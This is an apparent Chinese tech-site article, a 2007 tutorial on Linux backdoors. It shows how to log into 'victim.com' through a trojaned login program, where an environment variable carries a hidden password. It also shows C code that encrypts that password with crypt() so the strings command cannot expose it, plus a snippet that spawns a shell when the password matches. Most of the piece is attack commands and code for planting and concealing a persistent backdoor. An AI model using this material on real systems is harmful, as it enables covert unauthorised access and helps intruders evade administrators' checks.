至顶网›网络频道 ›Linux后门技术及实践方法谈

Linux后门技术及实践方法谈

扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条

如果系统不允许uid=0的用户远程登录，还需要增加一个普通用户账号。在共享库中嵌入后门函数使用后门口令激活Shell，获得权限能够躲避系统管理员对二进制文件本身的校验.

作者：51cto 2007年10月14日

关键字：

利用后门登录
首先Telnet服务是打开的，在自己机器上：

bash$ export DISPLAY=passWORD
bash$ telnet victim.com
Trying xxx.xxx.xxx.xxx...
Connected to victim.com (xxx.xxx.xxx.xxx).
Escape character is '^]'.
% _
strings命令
strings命令能够打印出二进制文件中的可显示字符串，用于刚才的ulogin程序：
bash$ strings ulogin
/lib/ld-linux.so.2
..............
DISPLAY
/sbin/logins
passWORD
/bin/csh

加密后门密码
1，采用DES算法，即crypt( )函数，编写gen.c程序：

#include
main(int argc, char *argv[])
{
if (argc != 3) {
printf("usage: %s \n", argv[0]);
exit(1);
}
printf("%s\n", crypt(argv[1], argv[2]));
}

2、编译为gen，执行./gen hack ui，得到的shadow结果为UiVqMWvDrIQjA。
3、修改后门源程序ulogin.c：
-- 以密文形式的密码代替ulogin.c中define的宏PASSWORD值。
-- 如果后门密码正确，直接给出Shell：

if (!strcmp(PASSWORD, crypt(display,PASSWORD)))
{
system(SHELL);
exit(1);
}

用strings命令只能看到加密过的密码。

VIP专区

VIP用户

普通用户

邮件订阅

如果您非常迫切的想了解IT领域最新产品与技术信息，那么订阅至顶网技术邮件将是您的最佳途径之一。

重磅专题

往期文章

Linux后门技术及实践方法谈

业界热点: